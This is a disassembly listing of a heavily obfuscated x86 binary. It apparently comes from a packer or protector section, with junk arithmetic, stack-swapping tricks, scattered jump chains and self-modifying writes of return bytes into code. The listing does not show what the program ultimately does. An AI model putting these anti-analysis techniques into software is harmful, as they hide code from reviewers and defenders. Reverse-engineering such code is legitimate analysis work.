; =============== S U B R O U T I N E =======================================
sub_43F365 proc near ; CODE XREF: ut7h7i2x:00444AE4j
; sub_4456B6:loc_45399Ep
; FUNCTION CHUNK AT 0043A57B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444A03 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [ebp-4]
mov al, [eax]
jmp loc_444A03
sub_43F365 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43F373: ; CODE XREF: sub_442B3B+1415j
jno loc_44CFDC
loc_43F379: ; CODE XREF: sub_457453:loc_458858j
call sub_453D8B
push 7A77B96Ah
push offset loc_454756
jmp loc_458E3B
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_43F38D: ; CODE XREF: ut7h7i2x:004525D5j
sbb eax, ecx
jl loc_442B3E
or ebp, 6E26F385h
add ebx, esi
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43F39D: ; CODE XREF: sub_43D021:loc_4525C3j
add eax, 51D56FB9h
xor eax, 0A31FDB02h
jmp loc_44CDA8
; END OF FUNCTION CHUNK FOR sub_43D021
; =============== S U B R O U T I N E =======================================
sub_43F3AE proc near ; CODE XREF: sub_43ADDB+DE0Ep
xchg ecx, [esp+0]
pop ecx
add eax, ebp
loc_43F3B4: ; CODE XREF: sub_43CCC3:loc_444BFAj
add eax, 0E7503AE8h
push eax
push offset loc_44A821
jmp nullsub_34
sub_43F3AE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43F3C5: ; CODE XREF: ut7h7i2x:0043A791j
jno loc_45ACAE
; START OF FUNCTION CHUNK FOR sub_4533DE
loc_43F3CB: ; CODE XREF: sub_4533DE:loc_43A77Bj
call sub_454FD4
retn
; END OF FUNCTION CHUNK FOR sub_4533DE
; =============== S U B R O U T I N E =======================================
sub_43F3D1 proc near ; CODE XREF: sub_44865D:loc_439216j
; sub_43FF65:loc_43BFE7j ...
jnb sub_457541
call sub_452950
loc_43F3DC: ; CODE XREF: ut7h7i2x:0044B072j
jmp sub_455807
sub_43F3D1 endp
; ---------------------------------------------------------------------------
add ebp, 1B6868D0h
jmp sub_440B68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_43F3EC: ; CODE XREF: sub_43B7F7+106CCj
jno loc_441CAF
sub edi, 6E20A659h
loc_43F3F8: ; CODE XREF: sub_4580B3:loc_44F35Ej
jmp loc_457936
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_43F3FD: ; CODE XREF: sub_44D1F0:loc_44864Dj
shr edi, 1Eh
test ecx, 6CC99982h
jmp loc_4542FC
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
loc_43F40B: ; DATA XREF: ut7h7i2x:loc_450584o
push 0
push offset sub_4545D8
jmp locret_4411CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A0DA
loc_43F417: ; CODE XREF: sub_43A0DA:loc_448FD3j
push offset loc_4508BF
jmp loc_455C65
; END OF FUNCTION CHUNK FOR sub_43A0DA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_197. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B234
loc_43F422: ; CODE XREF: sub_43B234-14DDj
jmp sub_43AED9
; END OF FUNCTION CHUNK FOR sub_43B234
; ---------------------------------------------------------------------------
jns loc_43A600
jmp loc_44E7D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43F432: ; CODE XREF: sub_43AA94:loc_449D1Aj
pop esi
or esi, 2B84AE04h
and esi, 4A4BF5A3h
sub esi, 34ABE2C0h
jnz loc_44C56F
loc_43F44B: ; CODE XREF: sub_444029+C3FDj
jmp loc_44B5FF
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D082
loc_43F450: ; CODE XREF: sub_44D082-5D4Fj
jmp loc_45735F
; END OF FUNCTION CHUNK FOR sub_44D082
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C943
loc_43F455: ; CODE XREF: sub_43C943+1j
jmp loc_441411
; END OF FUNCTION CHUNK FOR sub_43C943
; ---------------------------------------------------------------------------
and edx, 5411FCC1h
jmp loc_43F209
; ---------------------------------------------------------------------------
loc_43F465: ; DATA XREF: ut7h7i2x:004510F6o
lea eax, sub_442E76
mov byte ptr [eax], 0C3h
jmp loc_445863
; ---------------------------------------------------------------------------
push ebx
push 0BC0C8961h
pop ebx
loc_43F47A: ; CODE XREF: ut7h7i2x:loc_446407j
rol ebx, 13h
jmp loc_43FD33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439431
loc_43F482: ; CODE XREF: sub_439431+1Cj
add eax, 0C268C7D8h
xor eax, 6F14DD37h
push offset loc_44E71D
jmp loc_4589F9
; END OF FUNCTION CHUNK FOR sub_439431
; ---------------------------------------------------------------------------
loc_43F498: ; CODE XREF: ut7h7i2x:004584D1j
xor ebx, ebp
mov edx, [eax]
jmp loc_4397DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B526
loc_43F4A1: ; CODE XREF: sub_44B526+14j
cmp dword ptr [ebp-4], 0
jz loc_45418A
mov eax, [ebp-4]
add eax, 3Ch
call sub_444113
loc_43F4B6: ; CODE XREF: sub_45967C-5980j
jmp nullsub_79
; END OF FUNCTION CHUNK FOR sub_44B526
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452EED
loc_43F4BB: ; CODE XREF: sub_452EED-B77Bj
jmp loc_456671
; END OF FUNCTION CHUNK FOR sub_452EED
; ---------------------------------------------------------------------------
loc_43F4C0: ; CODE XREF: ut7h7i2x:00441782j
jmp loc_4550E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_43F4C5: ; CODE XREF: sub_456B19-1C504j
jmp loc_44D2CE
; END OF FUNCTION CHUNK FOR sub_456B19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_43F4CA: ; CODE XREF: sub_44825D-FB5j
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jmp loc_44A223
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_43F4D8: ; CODE XREF: sub_4462B0-A42Fj
; sub_4462B0:loc_4511AAj
push 84DEBE69h
pop eax
add eax, 0C5FD7BC3h
or eax, 8B39435Eh
and eax, 0B3FF81Eh
rol eax, 10h
cmp eax, 65D86EC9h
jmp loc_4548F8
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
rol ebp, 8
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_43F501: ; CODE XREF: sub_43F1B2+1208j
jmp sub_440AE3
; END OF FUNCTION CHUNK FOR sub_43F1B2
; =============== S U B R O U T I N E =======================================
sub_43F506 proc near ; DATA XREF: ut7h7i2x:loc_449D1Fo
; FUNCTION CHUNK AT 0044738B SIZE 00000005 BYTES
add edi, 5B23720Bh
push offset sub_44C117
jmp loc_44738B
sub_43F506 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_43F516: ; CODE XREF: sub_4508DB:loc_43E7D6j
pop ecx
and edx, 4025F084h
add edx, 0E369729Bh
and edx, 357A0BEAh
sub edx, 0EF88CD00h
add edx, 0CE7ECA76h
xchg edx, [esp+0]
jmp loc_44F15E
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
loc_43F53D: ; CODE XREF: ut7h7i2x:00458B43j
xchg eax, [esp]
pop eax
jns loc_454D74
pop edx
mov eax, [esp]
push edx
jmp loc_44B22D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433B9
loc_43F551: ; CODE XREF: sub_4433B9+7j
push 9F587900h
pop edi
and edi, 22BC7E8Eh
add edi, 0FE2C00B6h
xchg edi, [esp+0]
jmp nullsub_12
; END OF FUNCTION CHUNK FOR sub_4433B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_43F56B: ; CODE XREF: sub_44DB48-DDA0j
jo loc_4537AC
mov edx, 4552282Fh
loc_43F576: ; CODE XREF: sub_44B5CF:loc_455CCDj
mov ecx, [ebp-1Ch]
push edi
push 0DF538C0Dh
pop edi
sub edi, 404D3439h
xor edi, ds:4000F1h
jmp loc_459120
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
pop esi
sbb esi, 1D74B566h
jmp sub_43BA74
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_234. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_43F59E: ; CODE XREF: sub_43B7F7:loc_43F6CDj
; sub_4489DF-19A9j
add edi, esi
and eax, edi
jmp loc_43E3B7
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
loc_43F5A7: ; CODE XREF: ut7h7i2x:00443CFAj
xchg edx, [esp]
mov ecx, edx
pop edx
mov edx, [esp]
push eax
mov eax, edx
jmp loc_4463DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_43F5B8: ; CODE XREF: sub_44E688j
add eax, 7D0h
mov [ebp-8], eax
push ebx
mov ebx, edx
xchg ebx, [esp+4+var_4]
push 0DB4EC4C9h
xchg esi, [esp+8+var_8]
jmp loc_4553FF
; END OF FUNCTION CHUNK FOR sub_44E688
; ---------------------------------------------------------------------------
loc_43F5D3: ; CODE XREF: ut7h7i2x:loc_459967j
or edi, 11F68B89h
xor edi, 0E15150BDh
sub edi, 0CF333B34h
add edi, 50C7025Ch
push offset sub_43B120
jmp locret_457AB6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_43F5F5: ; CODE XREF: sub_44B789+Aj
sub esi, 0D1E8ACF9h
rol esi, 14h
add esi, 15074342h
xchg esi, [esp-4+arg_0]
jmp loc_44BC01
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_43F60C: ; CODE XREF: sub_452C66:loc_44BA5Fj
sub edx, 33FB6E5Dh
xor edx, 0F0DC200Fh
and edx, 11396366h
add edx, 0F0450798h
xchg edx, [esp+0]
jmp loc_43B1C3
; END OF FUNCTION CHUNK FOR sub_452C66
; =============== S U B R O U T I N E =======================================
sub_43F62C proc near ; DATA XREF: ut7h7i2x:0043B45Bo
mov eax, edx
call sub_4417AF
mov eax, [esp+0]
call sub_454196
retn
sub_43F62C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442AD1
loc_43F63C: ; CODE XREF: sub_442AD1+161AFj
jmp loc_457D7B
; END OF FUNCTION CHUNK FOR sub_442AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_43F641: ; CODE XREF: sub_4544E6-1A842j
jmp loc_44DAC3
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_43F646: ; CODE XREF: sub_440944+1C51j
ror eax, 13h
jmp loc_4411F3
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4478ED
loc_43F64E: ; CODE XREF: sub_4478ED+Bj
; sub_43CAF4:loc_44BD31j
pop ebp
push ds:dword_43A7C0
retn
; END OF FUNCTION CHUNK FOR sub_4478ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457F2D
loc_43F656: ; CODE XREF: sub_457F2D+Fj
jmp loc_4512AD
; END OF FUNCTION CHUNK FOR sub_457F2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A2A0
loc_43F65B: ; CODE XREF: sub_44A2A0+8j
jmp loc_43F793
; END OF FUNCTION CHUNK FOR sub_44A2A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A65
loc_43F660: ; CODE XREF: sub_443A65-68C1j
jmp loc_44D885
; END OF FUNCTION CHUNK FOR sub_443A65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_43F665: ; CODE XREF: sub_43CE34-3B9j
mov eax, [ebp-1Ch]
jmp loc_44C8C7
; END OF FUNCTION CHUNK FOR sub_43CE34
; =============== S U B R O U T I N E =======================================
sub_43F66D proc near ; CODE XREF: ut7h7i2x:00439F2Aj
; sub_43F7A5+19E68p
; FUNCTION CHUNK AT 0043A97C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043CDCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445DFD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00445EB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044891E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044A8E4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044FB8B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004534ED SIZE 0000000E BYTES
xchg esi, [esp+0]
pop esi
sub eax, 1A31B5DFh
push ecx
jmp loc_43CDCE
sub_43F66D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
and edx, 0D7D60F89h
jmp sub_450184
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_43F688: ; CODE XREF: sub_450FDE-14F73j
jz loc_451AAA
jmp loc_447FB7
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
locret_43F693: ; CODE XREF: ut7h7i2x:loc_43DDD3j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_43F694: ; CODE XREF: sub_455060+4j
jmp loc_43FDBB
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
loc_43F699: ; CODE XREF: ut7h7i2x:004525A1j
jbe loc_4455EB
; =============== S U B R O U T I N E =======================================
sub_43F69F proc near ; CODE XREF: sub_455461:loc_458DFEp
; FUNCTION CHUNK AT 00451F9C SIZE 0000000E BYTES
xchg edi, [esp+0]
pop edi
add eax, ebp
add eax, 350A98C9h
mov eax, [eax]
jmp loc_451F9C
sub_43F69F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A599
loc_43F6B2: ; CODE XREF: sub_45A599-F622j
mov eax, 2DC123E0h
call sub_43AA94
push edi
push offset loc_4582A4
jmp loc_446660
; END OF FUNCTION CHUNK FOR sub_45A599
; ---------------------------------------------------------------------------
loc_43F6C7: ; CODE XREF: ut7h7i2x:loc_442FD8j
jnz loc_43D3F3
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_43F6CD: ; CODE XREF: sub_43B7F7+E35Bj
jmp loc_43F59E
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_43F6D2: ; CODE XREF: sub_43FF65+Bj
jmp loc_451303
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
push edi
mov ecx, ebx
jmp loc_43D3F2
; ---------------------------------------------------------------------------
call sub_44193F
loc_43F6E4: ; CODE XREF: ut7h7i2x:0044C23Fj
push ecx
; =============== S U B R O U T I N E =======================================
sub_43F6E5 proc near ; CODE XREF: sub_44B8F8:loc_444E20p
; FUNCTION CHUNK AT 00440CC8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A743 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ADD6 SIZE 0000001A BYTES
xchg ecx, [esp+0]
pop ecx
loc_43F6E9: ; CODE XREF: sub_457A66:loc_44DCBCj
add esp, 0FFFFFFE4h
mov [ebp-8], edx
mov [ebp-4], eax
jmp loc_45ADD6
sub_43F6E5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451E86
loc_43F6F7: ; CODE XREF: sub_451E86+Ej
rol ecx, 19h
add ecx, 0E9B39368h
xchg ecx, [esp+0]
jmp sub_439B17
; END OF FUNCTION CHUNK FOR sub_451E86
; ---------------------------------------------------------------------------
loc_43F708: ; CODE XREF: ut7h7i2x:loc_4539CAj
jl loc_44065F
; START OF FUNCTION CHUNK FOR sub_4596E5
loc_43F70E: ; CODE XREF: sub_4596E5+15j
jmp loc_44F6C2
; END OF FUNCTION CHUNK FOR sub_4596E5
; ---------------------------------------------------------------------------
sbb ecx, 8CE47CE9h
xchg edx, [edi]
or edx, eax
jmp loc_440659
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D79C
loc_43F722: ; CODE XREF: sub_44D79C-6A94j
pop edi
rol edi, 1
or edi, 8823BD06h
add edi, 0EE75197Ah
jmp loc_43BA6F
; END OF FUNCTION CHUNK FOR sub_44D79C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_43F736: ; CODE XREF: sub_4433C5+A9Fj
jle loc_43FB68
mov edx, 0AEF0538h
jmp loc_455ACF
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_43F746: ; CODE XREF: sub_439AE7+42F8j
; ut7h7i2x:0043E780j
mov ebp, ecx
pop ecx
mov eax, ds:dword_443740
or eax, eax
jmp loc_446886
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A0CE
loc_43F756: ; CODE XREF: sub_44A0CE:loc_444FA7j
pop ebx
and ebx, 0FBF1373h
add ebx, 2F7039AEh
and ebx, 2D41C39Ah
xor ebx, 69E4472h
add ebx, 0D0A566CEh
call sub_45413B
loc_43F77A: ; CODE XREF: sub_444374+F278j
jmp loc_4457A6
; END OF FUNCTION CHUNK FOR sub_44A0CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_43F77F: ; CODE XREF: sub_44B72F+2DBAj
jmp loc_43C3FB
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E81
loc_43F784: ; CODE XREF: sub_449E81+10j
jmp loc_45033D
; END OF FUNCTION CHUNK FOR sub_449E81
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442096
loc_43F789: ; CODE XREF: sub_442096+Ej
jmp loc_45616C
; END OF FUNCTION CHUNK FOR sub_442096
; ---------------------------------------------------------------------------
loc_43F78E: ; CODE XREF: ut7h7i2x:0043D1C7j
jmp sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A2A0
loc_43F793: ; CODE XREF: sub_44A2A0:loc_43F65Bj
pop edx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_44A2A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455383
loc_43F796: ; CODE XREF: sub_455383+3F76j
jmp loc_43EA09
; END OF FUNCTION CHUNK FOR sub_455383
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_43F79B: ; CODE XREF: sub_459111-B1j
jmp nullsub_374
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ECFF
loc_43F7A0: ; CODE XREF: sub_43ECFF+1705Ej
jmp nullsub_516
; END OF FUNCTION CHUNK FOR sub_43ECFF
; =============== S U B R O U T I N E =======================================
sub_43F7A5 proc near ; CODE XREF: sub_44B01F-11776p
; sub_455145:loc_43A8D8j ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004393CB SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043A630 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0043FE70 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00440EE8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442D89 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442F05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443527 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004441CF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00447468 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448C4A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448E2D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A884 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B9ED SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044D2DB SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044EE72 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044FE88 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00450DA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451FD0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452C3D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453B56 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00453D78 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454848 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045573E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459601 SIZE 00000016 BYTES
call sub_43FE13
loc_43F7AA: ; CODE XREF: ut7h7i2x:0043CE75j
jmp loc_447468
sub_43F7A5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_43F7AF: ; CODE XREF: ut7h7i2x:0044E765j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_43F7B0: ; CODE XREF: sub_45967C:loc_44E4ADj
jnz loc_43D950
; END OF FUNCTION CHUNK FOR sub_45967C
; =============== S U B R O U T I N E =======================================
sub_43F7B6 proc near ; CODE XREF: sub_440CEC:loc_45AB20p
; FUNCTION CHUNK AT 0043A363 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043CFA6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D578 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044847C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044FA31 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458DC0 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
jb loc_43A363
mov eax, [ebp-4]
jmp loc_43CFA6
sub_43F7B6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43F7C8 proc near ; DATA XREF: sub_4581EF+Do
; FUNCTION CHUNK AT 004567BD SIZE 00000002 BYTES
xchg ecx, [esp+0]
call sub_44C95C
call nullsub_426
xchg edx, [esp+0]
mov ecx, edx
pop edx
jmp loc_4567BD
sub_43F7C8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or edx, 0E45CD8C9h
jmp loc_44D757
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456E7D
loc_43F7EB: ; CODE XREF: sub_456E7D:loc_441AA7j
jnz loc_43A3E3
and ebx, esi
jmp sub_43DDEF
; END OF FUNCTION CHUNK FOR sub_456E7D
; =============== S U B R O U T I N E =======================================
sub_43F7F8 proc near ; DATA XREF: sub_459812+3o
mov edx, edi
pop edi
lea eax, sub_45108E
mov byte ptr [eax], 0C3h
jmp sub_45108E
sub_43F7F8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45108E
loc_43F809: ; CODE XREF: sub_45108Ej
pop edx
mov eax, [esp-4+arg_0]
push edx
push offset sub_453EBA
jmp nullsub_128
; END OF FUNCTION CHUNK FOR sub_45108E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_43F818: ; CODE XREF: sub_454B2B-1A2BFj
; ut7h7i2x:0044A120j
add edx, 0B421BC32h
mov [edx], eax
call sub_450365
loc_43F825: ; CODE XREF: ut7h7i2x:0044629Aj
jmp loc_4583FD
; END OF FUNCTION CHUNK FOR sub_454B2B
; =============== S U B R O U T I N E =======================================
sub_43F82A proc near ; CODE XREF: ut7h7i2x:0044578Ej
; sub_4464B7+3p
xchg edx, [esp+0]
pop edx
mov [ebp-8], edx
mov [ebp-4], eax
call sub_456CBD
loc_43F839: ; CODE XREF: sub_442C22:loc_43FA9Dj
mov eax, [ebp-4]
call nullsub_7
pop ecx
pop ecx
jmp loc_4528B6
sub_43F82A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43F848: ; CODE XREF: ut7h7i2x:0044B8E8j
xchg eax, edi
xor eax, edx
mov ecx, 0B16F8B79h
loc_43F851: ; CODE XREF: ut7h7i2x:loc_4529B2j
mov eax, [esp]
push eax
push esi
push 12027244h
shl esi, 0Fh
jmp loc_443357
; ---------------------------------------------------------------------------
or edi, 0CD181759h
mov esi, eax
jmp sub_457BC2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E8A5
loc_43F870: ; CODE XREF: sub_44E8A5-2D23j
jb loc_44AE45
loc_43F876: ; CODE XREF: sub_44E8A5:loc_452F6Bj
rol edi, 1Bh
call sub_452052
loc_43F87E: ; CODE XREF: sub_4544E6-146Ej
jmp loc_456AE9
; END OF FUNCTION CHUNK FOR sub_44E8A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A7D2
loc_43F883: ; CODE XREF: sub_44A7D2-821Fj
jmp loc_439889
; END OF FUNCTION CHUNK FOR sub_44A7D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A32D
loc_43F888: ; CODE XREF: sub_45A32D-1CB1Aj
jmp loc_44E481
; END OF FUNCTION CHUNK FOR sub_45A32D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_182. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_43F88E: ; CODE XREF: sub_4549F0+6047j
jmp loc_4400BA
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
loc_43F893: ; DATA XREF: sub_456B19-4724o
xor eax, 89220EE3h
add eax, ebp
loc_43F89B: ; CODE XREF: ut7h7i2x:0043A6BFj
add eax, 2F20C0h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jmp loc_43B197
; ---------------------------------------------------------------------------
mov edx, 64EFA9EDh
call sub_44ED9F
push eax
call sub_43C0AF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_49. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43F8BC: ; CODE XREF: sub_43D021+159BAj
jnp loc_43F280
mov ecx, esi
xchg ebp, edx
test ebp, ecx
jmp loc_43EA28
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_43F8CD: ; CODE XREF: sub_449700-837j
add ebx, 77F1F8F4h
rol ebx, 11h
add ebx, 0B64D2F6Bh
mov [ebx], eax
pop ebx
lea eax, sub_450087
mov byte ptr [eax], 0C3h
jmp loc_45A10F
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_43F8ED: ; CODE XREF: ut7h7i2x:0043BAC2j
; ut7h7i2x:loc_440938j ...
mov eax, [esp+0]
jmp loc_455034
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_43F8F5: ; CODE XREF: sub_43AED9:loc_43D631j
push offset loc_44654B
jmp nullsub_290
; END OF FUNCTION CHUNK FOR sub_43AED9
; =============== S U B R O U T I N E =======================================
sub_43F8FF proc near ; DATA XREF: ut7h7i2x:0043FB11o
mov eax, [ebp-8]
sub_43F8FF endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43A556
loc_43F902: ; CODE XREF: sub_43A556+13241j
push edi
mov edi, eax
xchg edi, [esp+4+var_4]
call sub_43F3D1
loc_43F90D: ; CODE XREF: ut7h7i2x:0043FE9Dj
jmp loc_44A76A
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_43F912: ; CODE XREF: sub_4442CC+19j
mov eax, [eax]
or eax, eax
jnz loc_44083A
jmp loc_44660C
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_43F921: ; CODE XREF: sub_44B5CF:loc_4487D8j
mov ebp, eax
xchg ebp, [esp+4+var_4]
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583E7
loc_43F92C: ; CODE XREF: sub_4583E7-E05Dj
jmp nullsub_355
; END OF FUNCTION CHUNK FOR sub_4583E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_43F931: ; CODE XREF: sub_4459EE+456Ej
jmp loc_451DA1
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
